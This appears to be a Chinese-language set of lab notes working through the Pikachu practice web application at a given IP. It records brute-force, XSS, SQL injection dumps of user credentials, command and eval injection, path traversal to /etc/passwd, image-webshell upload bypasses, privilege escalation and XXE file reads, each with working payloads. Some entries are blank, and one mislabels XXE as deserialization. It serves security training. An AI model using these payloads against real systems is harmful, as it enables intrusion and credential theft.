- 漏洞标题:http://193.42.24.107:8081/vul/burteforce/bf_form.php 基于表单的暴力破解
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 【http://193.42.24.107:8081/vul/burteforce/bf_form.php】的POST请求
- 没有验证码
- 没有请求次数限制
- 操作过程:
- 采用字典:
- 爆破
- 【BurpSuite】+【Cluster bomb 模式】。
- 结果:
- 发现弱密码
- 漏洞标题:http://193.42.24.107:8081/vul/burteforce/bf_server.php 验证码绕过(on server),暴力破解
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 验证码,只要不重新请求,则一直有效。
- 没有请求次数限制
- 操作过程:
- 采用字典:
- 爆破
- 【BurpSuite】+【Cluster bomb 模式】。
- 此处,【验证码】直接填入【网页显示的验证码】。
- 结果:
- 发现弱密码
- 漏洞标题:http://193.42.24.107:8081/vul/burteforce/bf_client.php 验证码绕过(on client),暴力破解
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 验证码,由前端的【createCode()】方法生成。
- 提交时,虽然前端验证码在参数里面。
- 但经过尝试,发现,即使【验证码错误】,【后台】也未进行检查。
- 操作过程:
- 采用字典:
- 爆破
- 【BurpSuite】+【Cluster bomb 模式】。
- 此处,【验证码】随意填写。
- 结果:
- 发现弱密码
- 漏洞标题:http://193.42.24.107:8081/vul/burteforce/bf_token.php 绕过【token防爆破】,暴力破解
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 提交时,参数中有【token】字段
- 该字段,由【服务端渲染】网页,的【hidden】的【input】,决定。
- 然后,在提交时,该字段,也一起被提交。
- 操作过程:
- 采用字典:
- 爆破
- 【BurpSuite】+【Pitchfork 模式】。
- 使用【Grep - Extract】+【Redirections】。
- 可以自动提取,【hidden】的【input】的值。
- 结果:
- 发现弱密码
- 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_reflected_get.php 反射型xss(get)
- 漏洞等级:低
- 漏洞描述:
- 访问:
- 发现:
- 存在输入点
- 存在长度限制
- 操作过程:
- 手动修改【maxlength】,解除长度限制。
- 测试【
"'><svg/onload=print(1)//
】,成功。- 结果:
- 存在XSS。
- 漏洞标题:http://193.42.24.107:8081/vul/xss/xsspost/xss_reflected_post.php 反射性xss(post)
- 漏洞等级:低
- 漏洞描述:
- 访问:
- 发现:
- 先用之前的【弱密码】登录。
- 然后,看到一个输入点
- 操作过程:
- 测试【
"'><svg/onload=print(1)//
】,成功。- 结果:
- 存在XSS。
- 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_stored.php 存储型xss
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 存在输入点
- 操作过程:
- 测试【
"'><svg/onload=print(1)//
】,成功。- 结果:
- 存在XSS。
- 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_dom.php DOM型xss
- 漏洞等级:低
- 漏洞描述:
- 访问:
- 发现:
- 存在输入点
- 操作过程:
- 测试【
"'><img/onerror=print(1) src=0>//
】,成功。- 结果:
- 存在XSS。
- 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_dom_x.php DOM型xss-x
- 漏洞等级:低
- 漏洞描述:
- 访问:
- 发现:
- 存在输入点
- 操作过程:
- 测试【
"'><img/onerror=print(1) src=0>//
】。- 提交后,点击下方
<a>
链接。- 成功
- 结果:
- 存在XSS。
- 漏洞标题:http://193.42.24.107:8081/vul/xss/xssblind/xss_blind.php xss盲打
- 漏洞等级:高
- 漏洞描述:
- 访问:
- 发现:
- 存在输入点
- 操作过程:
- 评论栏,输入【
"'><img/onerror=print(1) src=0>//
】;名称栏,输入【"'><img/onerror=print(1) src=0>//
】。- 提交后,登录【http://193.42.24.107:8081/vul/xss//xssblind/admin_login.php】查看。
- 触发成功。
- 结果:
- 存在XSS。
- 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_01.php xss之过滤,绕过之后,执行xss
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 存在输入点
- 操作过程:
- 测试【
"'><img/onerror=print(1) src=0>//
】,成功。- 结果:
- 存在XSS。
- 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_02.php xss之htmlspecialchars,绕过之后,执行xss
- 漏洞等级:低
- 漏洞描述:
- 访问:
- 发现:
- 存在输入点
- 但是,一般的【
< > "
】,都会被 html实体化编码 转义掉。- 【
'
】单引号,不会被转义;但无法轻易闭合。- 【javascrtipt: 协议】,可以使用
- 操作过程:
- 测试【
javascript:print()
】- 提交后点击,成功。
- 结果:
- 存在XSS。
- 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_03.php xss之href输出,绕过之后,执行xss
- 漏洞等级:低
- 漏洞描述:
- 访问:
- 发现:
- 存在输入点
- 但是,一般的【
< > "
】,都会被 html实体化编码 转义掉。- 【
'
】单引号,不会被转义;但无法轻易闭合。- 【javascrtipt: 协议】,可以使用
- 操作过程:
- 测试【
javascript:print()
】- 提交后点击,成功。
- 结果:
- 存在XSS。
- 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_04.php xss之js输出,执行xss
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 存在输入点
- 写入到【
$ms=xxxxxx
】中去。- 操作过程:
- 测试【
一段文本';print() //
】- 提交后点击,成功。
- 结果:
- 存在XSS。
- 漏洞标题:http://193.42.24.107:8081/vul/csrf/csrfget/csrf_get_edit.php CSRF漏洞,GET请求
- 漏洞等级:高
- 漏洞描述:
- 访问:
- 发现:
登录之后,会保持登录状态。
存在修改个人信息,接口
原本信息为
姓名:lili 性别:girl 手机:18656565545 住址:usa 邮箱:lili@pikachu.com
_
- 操作过程:
- 结果:
- 存在 CSRF漏洞。
- 漏洞标题:http://193.42.24.107:8081/vul/csrf/csrfpost/csrf_post_edit.php CSRF漏洞,POST请求
- 漏洞等级:高
- 漏洞描述:
- 访问:
- 发现:
- 登录之后,会保持登录状态。
- 存在修改个人信息,接口
- 操作过程:
- 第一种方式:利用XSS漏洞,使用xhr发送post请求。
- 第二种方式:利用【文件上传漏洞】+【CSRF】
- 构造一个 伪造页面。
- 使用【文件上传漏洞】,提交至【PHP服务端】。
- 将form表单的提交路径,改为【http://193.42.24.107:8081/vul/csrf/csrfpost/csrf_post.php】。
- 两种提交方式:
- 自动方式:js触发提交。
- 手动方式:用户自己点击。
- 将链接,发送给目标用户。
- 第三种方式:利用XSS漏洞,模拟【钓鱼页面】。
- 使用【QuickMocker】,来返回一个HTML页面。
- 使用【XSS】,加载对应的【HTML页面】。
- 结果:
- 存在 CSRF漏洞。
(似乎,这里,无法由 CSRF 突破。)
- 漏洞标题:http://193.42.24.107:8081/vul/csrf/csrftoken/token_get_edit.php CSRF漏洞,带token
- 漏洞等级:高
- 漏洞描述:
- 访问:
- 发现:
- 在接口请求中
- 存在,手动填写的资料信息。
- 还存在【token】参数。
- 操作过程:
- _
- 结果:
- 似乎,不存在 CSRF ?
(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)
- 漏洞标题:http://193.42.24.107:8081/vul/sqli/sqli_id.php SQL注入
- 漏洞等级:高
- 漏洞描述:
- 访问:
- 发现:
- 【id】参数,可能可以注入
- 输入【id=6'】测试,证明了。
- 操作过程:
- 对于【
/vul/sqli/sqli_id.php
】接口
submit=查询&id=6
- 确认字段个数
id=6 order by 3
id=6 order by 2
- 确认,位数为2
- 查看【显示位】
id=-6 union select 1,2
- 确定,分别对应位置
- 爆库
id=-1 union select 1,group_concat(schema_name) from information_schema.schemata
- 爆表
id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="pikachu"
- 爆列
id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
- 爆值
id=-1 union select 1,concat_ws('-',username,password) from users
- 得到了,所有用户的账号、密码。
- 结果:
- 存在 SQL注入漏洞。
(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)
- 漏洞标题:http://193.42.24.107:8081/vul/sqli/sqli_str.php SQL注入
- 漏洞等级:高
- 漏洞描述:
访问:
发现:
在访问【http://193.42.24.107:8081/vul/sqli/sqli_str.php?name=lili&submit=查询】时,显示了【lili】用户的数据。
your uid:7 your email is: 1
_
操作过程:
- 对于【
/vul/sqli/sqli_str.php
】接口
submit=查询&name=lili
- 确认字段个数
lili' order by 4 %23
lili' order by 3 %23
lili' order by 2 %23
- 确认,位数为2
- 查看【显示位】
-1' union select 1,2 %23
- 确定,分别对应位置
- 爆库
-1' union select 1,group_concat(schema_name) from information_schema.schemata %23
- 爆表
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema="pikachu" %23
- 爆列
-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' %23
- 爆值
-1' union select 1,concat_ws('-',username,password) from users %23
- 得到了,所有用户的账号、密码。
结果:
- 存在 SQL注入漏洞。
(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)
- 漏洞标题:http://193.42.24.107:8081/vul/sqli/sqli_search.php SQL注入
- 漏洞等级:高
- 漏洞描述:
访问:
发现:
在访问【http://193.42.24.107:8081/vul/sqli/sqli_search.php?name=li&submit=搜索】时,显示了【lili】用户的数据。
用户名中含有li的结果如下: username:lili uid:7 email is: 1
_
操作过程:
- 对于【
/vul/sqli/sqli_search.php
】接口
submit=查询&name=li
- 确认字段个数
lili' order by 4 %23
lili' order by 3 %23
- 确认,位数为3
- 查看【显示位】
-1' union select 1,2,3 %23
- 确定,分别对应位置
- 爆库
-1' union select 1,2,group_concat(schema_name) from information_schema.schemata %23
- 爆表
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="pikachu" %23
- 爆列
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23
- 爆值
-1' union select 1,2,concat_ws('-',username,password) from users %23
- 得到了,所有用户的账号、密码。
结果:
- 存在 SQL注入漏洞。
(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)
- 漏洞标题:http://193.42.24.107:8081/vul/sqli/sqli_x.php SQL注入
- 漏洞等级:高
- 漏洞描述:
访问:
发现:
在访问【http://193.42.24.107:8081/vul/sqli/sqli_x.php?name=lili&submit=查询】时,显示了【lili】用户的数据。
your uid:7 your email is: 1
_
操作过程:
- 对于【
/sqli_x.php?name=lili&submit=查询
】接口
submit=查询&name=lili
- 此处,SQL注入类型,稍有不同:
- 【
lili') %23
】,这种方式- 确认字段个数
lili') order by 4 %23
lili') order by 3 %23
lili') order by 2 %23
- 确认,位数为2
- 查看【显示位】
-1') union select 1,2 %23
- 确定,分别对应位置
- 爆库
-1') union select 1,group_concat(schema_name) from information_schema.schemata %23
- 爆表
-1') union select 1,group_concat(table_name) from information_schema.tables where table_schema="pikachu" %23
- 爆列
-1') union select 1,group_concat(column_name) from information_schema.columns where table_name='users' %23
- 爆值
-1') union select 1,concat_ws('-',username,password) from users %23
- 得到了,所有用户的账号、密码。
结果:
- 存在 SQL注入漏洞。
- 漏洞标题:
- 漏洞等级:
- 漏洞描述:
- _
- 漏洞标题:
- 漏洞等级:
- 漏洞描述:
- _
- 漏洞标题:
- 漏洞等级:
- 漏洞描述:
- _
- 漏洞标题:
- 漏洞等级:
- 漏洞描述:
- _
- 漏洞标题:
- 漏洞等级:
- 漏洞描述:
- _
- 漏洞标题:
- 漏洞等级:
- 漏洞描述:
- _
- 漏洞标题:http://193.42.24.107:8081/vul/rce/rce_ping.php RCE远程代码执行
- 漏洞等级:高
- 漏洞描述:
- 访问:
- 发现:
- 存在输入点,提示输入 IP 地址。
- 操作过程:
- 测试【
193.42.24.107 | ls
】- 结果:发现,确实可以执行【ls】命令。
- 测试【
193.42.24.107 | whoami
】- 测试【
193.42.24.107 | pwd
】,查看当前目录- 结果:
- 存在 RCE远程代码执行 。
- 漏洞标题:http://193.42.24.107:8081/vul/rce/rce_eval.php RCE远程代码执行(通过PHP)
- 漏洞等级:高
- 漏洞描述:
- 访问:
- 发现:
- 存在输入点。
- 又因为【eval函数】的提示。
- 操作过程:
- 测试【
phpinfo();
】。
- 成功显示出结果。
- 测试【
system( '命令' );
】
system( 'whoami' );
system( 'pwd' );
system( 'ls' );
- 结果:
- 存在 RCE远程代码执行 。
- 漏洞标题:http://193.42.24.107:8081/vul/fileinclude/fi_local.php 文件包含(本地)
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 简单提交后,url变成了【?filename=file2.php】。
- 这里,可以手动指定,文件路径。
- 操作过程:
- 反复测试上下级目录
- 测试【
http://193.42.24.107:8081/vul/fileinclude/fi_local.php?filename=../../../../etc/passwd&submit=提交查询
】。
- 成功显示出结果。
- 结果:
- 存在 文件包含(本地) 。
- 漏洞标题:提示【allow_url_include】未打开。
- 漏洞等级:
- 漏洞描述:
- 所以,无法完成。
- 漏洞标题:http://193.42.24.107:8081/vul/unsafedownload/down_nba.php 下载敏感文件
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 操作过程:
- 尝试在【filename参数】上突破。
- 测试【http://193.42.24.107:8081/vul/unsafedownload/execdownload.php?filename=../../../../etc/passwd】
- 成功下载 passwd 文件。
- 结果:
- 存在 下载敏感文件 。
- 漏洞标题:http://193.42.24.107:8081/vul/unsafeupload/clientcheck.php 文件上传漏洞(客户端校验)
- 漏洞等级:高
- 漏洞描述:
- 访问:
- 发现:
- 有一个文件上传点。
- 尝试上传【phpinfo.php】,发现被拦截。
- 操作过程:
- 经过查看js代码,发现是客户端做的拦截。
- 用【BurpSuite】进行Response拦截,将【checkFileExt】函数的【var arr】,增加【php后缀】。
- 上传【phpinfo.php】。
- 得到保存路径【uploads/phpinfo.php】。
- 访问【http://193.42.24.107:8081/vul/unsafeupload/uploads/phpinfo.php】,成功执行。
- 结果:
- 存在 文件上传漏洞。
- 漏洞标题:http://193.42.24.107:8081/vul/unsafeupload/servercheck.php 文件上传漏洞(MIME type 绕过)
- 漏洞等级:高
- 漏洞描述:
- 访问:
- 发现:
- 有一个文件上传点。
- 尝试上传【phpinfo.php】,发现被拦截。
- 好像,不是客户端拦截。
- 操作过程:
- 初步判断,是服务端拦截。
- 先从【MIME type】的线索,进行尝试;修改【MIME type】,也就是【Content-Type】。
- 使用【BurpSuite】拦截请求,将【phpinfo.php】的【Content-Type】,修改为【image/jpg】。
- 放行请求;发现上传成功了。
- 访问【http://193.42.24.107:8081/vul/unsafeupload/uploads/phpinfo.php】,成功执行。
- 结果:
- 存在 文件上传漏洞。
- 漏洞标题:http://193.42.24.107:8081/vul/unsafeupload/getimagesize.php 文件上传漏洞(getimagesize 绕过)
- 漏洞等级:高
- 漏洞描述:
- 访问:
- 发现:
- 有一个文件上传点。
- 尝试修改【Content-Type】,并未能通过。
- 根据提示,应该和【getimagesize】方法有关。
- 操作过程:
- 尝试使用【图片加马】,来进行绕过。
- 创建【1像素】png图片。
- 使用【HxD Editor】,在图片末尾,加上【
<?php phpinfo();?>
】。- 进行上传,上传成功。得到【上传地址】。
- 该地址,直接点击,仅仅是【图片格式】。
- 所以,我们要使用【文件包含漏洞】,来配合执行。
- 访问【
193.42.24.107:8081/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2021/06/13/48295681ao23k1934dcp3497.png&submit=提交查询
】,成功执行。- 结果:
- 存在 文件上传漏洞。
- 漏洞标题:http://193.42.24.107:8081/vul/overpermission/op1/op1_mem.php 水平越权
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 登录后,可以通过【
http://193.42.24.107:8081/vul/overpermission/op1/op1_mem.php?username=lili&submit=点击查看个人信息
】接口,查看信息。
- 该接口,【username】参数,是明文传输的。
- 操作过程:
- 将【username】修改为【lucy】、【kobe】,等。
- 依然可以查看,其它用户的个人信息
- 邮箱、手机、住址
- 结果:
- 存在 水平越权漏洞。
- 漏洞标题:http://193.42.24.107:8081/vul/overpermission/op2/op2_login.php 垂直越权
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 添加用户时,通过【
/vul/overpermission/op2/op2_admin_edit.php
】接口提交。
- 可以尝试一下
- 操作过程:
- 使用【BurpSuite】,抓取【超级管理员】添加用户的数据包。
- 将【
/vul/overpermission/op2/op2_admin_edit.php
】接口的【数据包】,修改【PHPSESSID】的cookie参数
- 将原本的【超级管理员】cookie,改为【普通用户】cookie。
- 然后,用【Repeater】进行发包。
- 成功。
- 可以看到,普通用户,也【添加用户】成功。
- 结果:
- 存在 垂直越权漏洞。
- 漏洞标题:http://193.42.24.107:8081/vul/dir/dir_list.php 目录遍历
- 漏洞等级:中
- 漏洞描述:
- 漏洞标题:http://193.42.24.107:8081/vul/infoleak/findabc.php 敏感信息泄露
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 在【源代码】中,有一处注释,
<!-- 测试账号:lili/123456-->
。- 操作过程:
- 使用【lili / 123456】,登录成功。
- 结果:
- 存在 敏感信息泄露漏洞。
(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)
- 漏洞标题:http://193.42.24.107:8081/vul/unserilization/unser.php
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 需要对照【PHP源代码】查看。
- 操作过程:
- 构造一个【名为S】的class。
- 并且,有【$test】的类变量。
- 将其序列化,得到【
O:1:"S":1:{s:4:"test";s:22:"<svg/onload=print(1)//";}
】- 填入输入框,提交。
- 成功触发。
- 结果:
- 存在 PHP反序列化漏洞。
(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)
- 漏洞标题:http://193.42.24.107:8081/vul/xxe/xxe_1.php XXE漏洞
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 需要对照【PHP源代码】查看。
- 操作过程:
- 测试基本显示,【
<?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY xiaoming "XiaoMing"> ]> <name>&xiaoming;</name>
】
- 能够正常显示
- 测试【
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE name [ <!ENTITY myfile SYSTEM "file:///etc/passwd">]> <name>&myfile;</name>
】
- 能够正常显示
- 测试【
<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> ]> <x>&f;</x>
】
- Base64,能够正常显示
- 测试【】
- 结果:
- 存在 PHP反序列化漏洞。
- 漏洞标题:http://193.42.24.107:8081/vul/urlredirect/urlredirect.php 不安全的URL跳转
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 存在【url】参数,决定了重定向地址。
- 操作过程:
- 结果:
- 存在 不安全的URL跳转。
- 漏洞标题:http://193.42.24.107:8081/vul/ssrf/ssrf_curl.php SSRF漏洞,curl相关
- 漏洞等级:高
- 漏洞描述:
- 访问:
- 发现:
- 因为有了提示,使用了【curl】库。
- 后台配置错误,给出的demo,默认url为【http://127.0.0.1/vul/vul/ssrf/ssrf_info/info1.php】
- 操作过程:
- 结果:
- 存在 SSRF漏洞。
- 漏洞标题:http://193.42.24.107:8081/vul/ssrf/ssrf_fgc.php SSRF漏洞,file_get_content相关
- 漏洞等级:中
- 漏洞描述:
- 访问:
- 发现:
- 【file_get_content】其实和【curl】类似。
- 后台配置错误,给出的demo,默认url为【http://127.0.0.1/vul/vul/ssrf/ssrf_info/info1.php】
- 操作过程:
- 结果:
- 存在 SSRF漏洞。
- 漏洞标题:
- 漏洞等级:
- 漏洞描述:
- _
- 漏洞标题:
- 漏洞等级:
- 漏洞描述:
- _
- 漏洞标题:
- 漏洞等级:
- 漏洞描述:
- _